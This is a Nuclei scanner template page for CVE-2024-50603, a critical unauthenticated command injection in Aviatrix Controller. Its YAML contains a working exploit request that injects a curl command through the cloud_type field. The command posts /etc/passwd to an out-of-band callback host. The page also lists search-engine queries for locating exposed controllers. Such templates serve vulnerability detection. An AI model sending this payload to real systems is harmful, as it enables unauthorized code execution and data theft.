Skip to content
Nuclei Templates

Aviatrix Controller - Remote Code Execution

ID: CVE-2024-50603

Severity: critical

Author: newlinesec,securing.pl

Tags: cve,cve2024,aviatrix,controller,rce,oast,kev

Description

Section titled “Description”

An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.

YAML Source

Section titled “YAML Source”
id: CVE-2024-50603


info:
  name: Aviatrix Controller - Remote Code Execution
  author: newlinesec,securing.pl
  severity: critical
  description: |
    An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
  reference:
    - https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/
    - https://docs.aviatrix.com/documentation/latest/network-security/index.html
    - https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers
    - https://nvd.nist.gov/vuln/detail/CVE-2024-50603
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-50603
    cwe-id: CWE-78
    epss-score: 0.00046
    epss-percentile: 0.1845
  metadata:
    verified: true
    max-request: 1
    vendor: aviatrix
    product: controller
    shodan-query:
      - http.title:"aviatrix controller"
      - http.title:"aviatrix cloud controller"
    fofa-query:
      - app="aviatrix-controller"
      - title="aviatrix cloud controller"
    google-query: intitle:"aviatrix cloud controller"
    zoomeye-query: app="Aviatrix Controller"
  tags: cve,cve2024,aviatrix,controller,rce,oast,kev


variables:
  oast: "{{interactsh-url}}"


http:
  - raw:
      - |
        POST /v1/api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        name: http
        words:
          - "http"


      - type: status
        status:
          - 200


      - type: regex
        part: interactsh_request
        regex:
          - 'root:.*:0:0:'
# digest: 4a0a00473045022100f105890cba4b3b7a7b1d698cf698620c814fdfd038e80ee3d4311aa0a73cd41e02204e1a6aafda68d87f828e015d8eb19a6e6758176833bdd87fd3973ac70a0c2d40:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-50603.yaml"

View on Github